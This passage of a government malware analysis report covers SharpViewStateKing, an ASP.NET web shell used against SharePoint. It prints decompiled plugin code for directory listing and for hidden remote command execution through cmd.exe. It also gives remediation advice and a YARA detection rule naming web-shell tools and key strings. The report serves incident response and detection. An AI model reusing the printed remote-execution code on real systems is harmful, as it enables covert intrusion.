Convert.ToBase64String(memoryStream.ToArray()), File.GetLastWriteTime(fileSystemInfo.FullName).ToString("yyyy-MM-dd hh:mm:ss"), text)); memoryStream.Close(); } } catch (Exception ex) { stringBuilder.Append(ex.Message); } return stringBuilder.ToString(); } } </code> </pre> </div> <details><summary>Figure 10 long description – list_directory method in ListDirectory</summary><p>The figure shows a C# class named ListDirectory with a public static method list_directory that takes a path and returns a formatted string of directory contents. It iterates through FileSystemInfo entries, saves each item’s shell icon to a MemoryStream as PNG (then Base64), determines whether the entry is a directory or file and, for files, captures the size.</p> </details><div class="clearfix"> </div> <ol start="2"><li><strong>GetIcon(string file):</strong>extracted visual icons or thumbnails from files to help identify file types <ul><li>image file types (e.g., .jpg, .jpeg, .gif, .png, .bmp) were opened to create a 48×48 pixel thumbnail</li> <li>all other file types extracted the associated Windows shell icon, converted it to a bitmap graphic, and returned the icon to the threat actor as a bitmap object</li> </ul></li> </ol><div class="clearfix"> </div> <h4 class="text-center">Figure 11: GetIcon method in ListDirectory class</h4> <div class="container"> <pre> <code> public class ListDirectory { private static Bitmap GetIcon(string file) { try { if (file.EndsWith("jpg") || file.EndsWith("jpeg") || file.EndsWith("gif") || file.EndsWith("png") || file.EndsWith("bmp")) { Bitmap val = new Bitmap(file); return new Bitmap(((Image)val).GetThumbnailImage(48, 48, (GetThumbnailImageAbort)(() =&gt; false), IntPtr.Zero)); } Icon val2 = Icon.ExtractAssociatedIcon(file); return val2.ToBitmap(); } catch { return new Bitmap(48, 48); } } } </code> </pre> </div> <details><summary>Figure 11 long description – GetIcon method in ListDirectory class</summary><p>The figure contains a C# snippet from a class named ListDirectory defining a private static method GetIcon that returns a Bitmap for a given file path. Inside a try block, it checks if the file has an image extension (jpg, jpeg, gif, png, bmp); for images it creates a 48×48 thumbnail from the bitmap, and for other files it extracts the system-associated icon using Icon.ExtractAssociatedIcon and converts it to a bitmap. If any error occurs, the method falls back to returning a new 48×48 bitmap as a default.</p> </details><div class="clearfix"> </div> <h3>Observation 6</h3> <p><strong>Main capability:</strong> RemoteExec</p> <p><strong>Observed technique:</strong> RemoteExec (<a href="https://attack.mitre.org/techniques/T1059/003/">T1059.003</a>)</p> <p>This plugin implemented a class that enabled the threat actor to remotely execute a command or existing executable on the compromised host and return its output by:</p> <ul><li>taking the target command as an argument</li> <li>decoding the following hard-coded Base64 string: <strong><code>QzpcV2luZG93c1xTeXN0ZW0zMlxjbWQuZXhl</code></strong> into <strong><code>C:\Windows\System32\cmd.exe</code></strong>.</li> <li>launching the above <strong><code>cmd.exe</code></strong> process as a hidden window, writing the supplied command plus "<strong><code>&amp;exit</code></strong>" to <strong><code>StandardInput</code></strong>, then extracting both the <strong><code>StandardOutput</code></strong> and <strong><code>StandardError</code></strong></li> </ul><p>The result is returned via <abbr title="hypertext transfer protocol">HTTP</abbr> response by the constructor.</p> <div class="clearfix"> </div> <h4 class="text-center">Figure 12: ExecCmd method in RemoteExec class</h4> <div class="container"> <pre> <code> public class RemoteExec { public static string ExecCMD(string command) { string empty = string.Empty; string fileName = Encoding.UTF8.GetString(Convert.FromBase64String("QzpcV2luZG93c1xTeXN0ZW0zMlxjbWQuZXhl")); string text = command + "&amp;exit"; try { ProcessStartInfo processStartInfo = new ProcessStartInfo(); processStartInfo.FileName = fileName; processStartInfo.RedirectStandardInput = true; processStartInfo.RedirectStandardOutput = true; processStartInfo.RedirectStandardError = true; processStartInfo.UseShellExecute = false; processStartInfo.CreateNoWindow = true; Process process = new Process(); process.StartInfo = processStartInfo; process.Start(); process.StandardInput.WriteLine(text); empty = process.StandardOutput.ReadToEnd(); empty = empty.Substring(empty.IndexOf(text) + text.Length); empty += process.StandardError.ReadToEnd(); process.WaitForExit(); process.Close(); } catch (Exception ex) { empty = $"\r\n[!] ExecCMD error: {ex.Message}"; } return empty; } } </code> </pre> </div> <details><summary>Figure 12 long description – ExecCmd method in RemoteExec class</summary><p>The figure shows a C# class named RemoteExec with a public static method ExecCMD that runs a shell command and returns its output. It decodes a base64 string to obtain the executable name, builds a ProcessStartInfo with standard input/output/error redirected, writes the command followed by “&amp;exit,” then reads both stdout and stderr before waiting for the process to finish. If an exception occurs, the method returns a formatted error message containing the exception text.</p> </details><div class="clearfix"> </div> <!–** TOP OF PAGE ******–> <div class="clearfix"> </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <h2 class="text-info" id="5">Indicators of compromise and recommendations</h2> <p>Indicators of compromise (IoCs) were distributed through alerts and communications by the Canadian Cyber Security Incident Response Team (CSIRT). This ensured that partners across all sectors had the information they needed to act decisively.</p> <p>Due to the capabilities demonstrated by the implant framework, a full rebuild of all infected hosts is strongly recommended. Encryption and validation keys in the ASP.NET web application should be treated as compromised and replaced, following Microsoft’s <a href="https://www.microsoft.com/en-us/msrc/blog/2025/07/customer-guidance-for-sharepoint-vulnerability-cve-2025-53770/">Customer guidance for SharePoint vulnerability CVE-2025-53770</a>. Network detection and response (NDR) and endpoint detection and response (EDR) telemetry should be examined for evidence of lateral movement to other network hosts by checking for:</p> <ul><li>newly created user accounts</li> <li>recently installed software (e.g., SoftEther <abbr title="virtual private network">VPN</abbr>)</li> <li>any modifications to settings like Microsoft Defender Antivirus exclusions.</li> </ul><p>Additionally, all passwords and credentials on the victim’s system should be considered compromised and, therefore, rotated.</p> <p>For up-to-date information on <a href="/en/alerts-advisories">alerts and advisories</a> or <a href="/en/guidance">cyber security guidance</a>, please <a href="/en/contact-cyber-centre">contact the Cyber Centre</a>.</p> <h2 class="text-info" id="6">Cyber Centre tools and services</h2> <p>No single tool, service or turnkey solution can reconstruct an incident, trace a threat actor’s path or validate a threat on its own. A holistic approach using multiple perspectives is required to conduct a thorough investigation. As such, the Cyber Centre relies on multiple layered telemetry sources to detect threats and protect monitored assets.</p> <p><a href="/en/tools-services/assemblyline">Assemblyline</a> was used to enable triage at scale, processing hundreds of thousands of files per day by leveraging over 75 anti-virus products and checking hashes against a local cache of VirusTotal results. In this incident, all 67 unique malware samples retrieved did not result in a single detection.</p> <p>In response to this incident, the Cyber Centre created YARA rules that target C# code rather than compiled DLLs, resulting in more flexible detection rules. Additional YARA rules will be released periodically after an evaluation period to ensure accuracy.</p> <p>The sample YARA rule below implements detections for several of the observed malware.</p> <div class="clearfix"> </div> <h4 class="text-center">Figure 13: YARA rule for observed malware</h4> <div class="container"> <pre> <code> rule SharpViewStateKing { meta: id = "6gLZaiLFk2mV4fWlj0eIQ2" fingerprint = "00b4dfca3c9c883088259ec9b125411e0896be54cfe08201b03f36d51ae05c8b" version = "1.0" date = "2026-05-01" modified = "2026-05-01" status = "RELEASED" sharing = "TLP:CLEAR" source = "CCCS" author = "reveng@CCCS" description = "Detects SharpViewStateKing webshell." category = "MALWARE" malware = "SHARPVIEWSTATEKING" malware_type = "WEBSHELL" mitre_att = "T1505.003" hash = "547b65933c4b6af8a240cca21175398775abe228eceea2c4138b262ed0a90967" hash = "24c600584c3d36cfc02c8dbc528306fe8b69971045b299de8186954e0eed0f3e" hash = "8d7713e2687dd2e9311e3a3f5df85ecc20dbf4c4b0c91086e0c53bd2c112bde1" hash = "a6d7461a88cf7f12072b812499fee3ac6d08acff4db611623871765b60cf1014" hash = "921f6502b79b542b2123ba05f86ccfe44746a5feeefc92d7cf5506f04c47b58a" hash = "6c249e9a4a55b18a0d17e9430666ccbf61b2fe6349e18e830c4f55ae47fc87d5" hash = "1f258c70dfb064e6e1a55885b22660aa034469699be7e0ffeb5d174c8afa72c8" hash = "d2f2f0941fe3cb70ba4aeb0927d1a8abcf556d4150832962eb3cc6c13d6c7256" strings: $web_1 = "&amp;__SCROLLPATH=" wide $web_2 = "/wEPDwUKLTcyODc4" wide $web_3 = "__VIEWSTATE={0}&amp;__VIEWSTATEGENERATOR={1}" wide $web_4 = "DecodeViewState" $web_5 = "CraeteViewState" $web_6 = "WebForms_HiddenFieldPageStatePersister_ClientState" $web_7 = "ViewStateUserKey" wide nocase $web_8 = "__VIEWSTATEENCRYPTED" wide $web_9 = "__VIEWSTATE" wide $web_10 = "&amp;__SCROLLPOSITION=" wide $web_11 = "&lt;input type=\"hidden\" name=\"" wide $web_12 = "&lt;input type=\"\"hidden\"\" name=\"\"__VIEWSTATE\"\" id=\"\"__VIEWSTATE\"\" value=\"\"/wEPDwUKLTcyODc4\"" $web_13 = "&amp;__VIEWSTATEGENERATOR=" wide $web_14 = "FriendlyUrlsViewSwitcherRoute" $web_15 = "System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(" $str_plugin_1 = "antsword" $str_plugin_2 = "godzilla" $str_plugin_3 = "ghostwebshell" $str_payload_dotnet_serialized = ": \"/wEyo" $str_name_1 = "SharpViewStateKing" ascii wide $str_name_2 = "ViewStateKing" ascii wide $str_name_3 = "ViewStateLibrary" $str_enc = "EncryptOrDecryptData" $str_key = "3c6e0b8a9c15224a" $str_enc_func = "public static byte[] Enc(byte[] data)" $str_dec_func = "public static byte[] Dec(byte[] data)" $str_sys_info = "SELECT * FROM Win32_NetworkAdapterConfiguration WHERE IPEnabled = ‘TRUE’" $str_dll = "a4hmgwwu.dll" $str_bypass = "[!] Bypass error: {0}" wide condition: 2 of ($web_*) and 2 of ($str_*) } </code> </pre> </div> <details><summary>Figure 13 long description – YARA rule for observed malware</summary><p>This YARA rule detects the SharpViewStateKing ASP.NET web shell, which abuses the ViewState mechanism and base64-encoded page state to execute commands, including references to known web shell tooling and .NET methods for encoding/decoding and custom encryption/decryption. It is intended for scanning ASP.NET pages and .NET assemblies where hidden input fields and serialized payloads may be present; false positives should be rare but can occur in heavily customized applications that manipulate ViewState in nonstandard ways.</p> </details><div class="clearfix"> </div> <!–** TOP OF PAGE ******–> <div class="clearfix"> </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <h2 class="text-info" id="7">Acknowledgments</h2> <p>As a part of the Communications Security Establishment Canada (CSE), the Cyber Centre is a proud member of the Five Eyes, the world’s longest-standing and closest intelligence-sharing alliance. Sharing <abbr title="indicators of compromise">IoCs</abbr> and TTPs with the cyber community and Five Eyes partners has been instrumental since SharpViewStateKing plugins were first discovered, and ongoing analytical exchanges have maximized the value of collected data.</p> <section class="alert alert-info"><p><strong>Disclaimer: </strong>The Cyber Centre disclaims all liability for any loss, damage, or costs arising from the use of or reliance on the information within this article. Readers are solely responsible for verifying the accuracy and applicability of any information before acting on it.</p> </section><!–FOOTNOTE SECTION EN–><aside class="wb-fnote" role="note"><h2 class="text-info" id="8">References</h2> <dl><dt>Footnote 1</dt> <dd id="fn1"> <p>The Cyber Centre is aware of an open-source project of the same name previously available on <a href="https://github.com/RowTeam/SharpViewStateKing">GitHub</a> until 2023 when it became private.</p> <p class="fn-rtn"><a href="#fn1-rf"><span class="wb-inv">Return to footnote</span>1<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 2</dt> <dd id="fn2"> <p><a href="https://www.microsoft.com/en-us/security/blog/2025/02/06/code-injection-attacks-using-publicly-disclosed-asp-net-machine-keys/">Code injection attacks using publicly disclosed ASP.NET machine keys</a></p> <p class="fn-rtn"><a href="#fn2-rf"><span class="wb-inv">Return to footnote</span>2<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 3</dt> <dd id="fn3"> <p><a href="https://github.com/fortra/impacket/blob/master/examples/secretsdump.py">Impacket secretsdump.py</a></p> <p class="fn-rtn"><a href="#fn3-rf"><span class="wb-inv">Return to footnote</span>3<span class="wb-inv"> referrer</span></a></p> </dd> </dl></aside></div> </div> </div> </div> </div> </article>

Share Websitecyber
We are an ethical website cyber security team and we perform security assessments to protect our clients.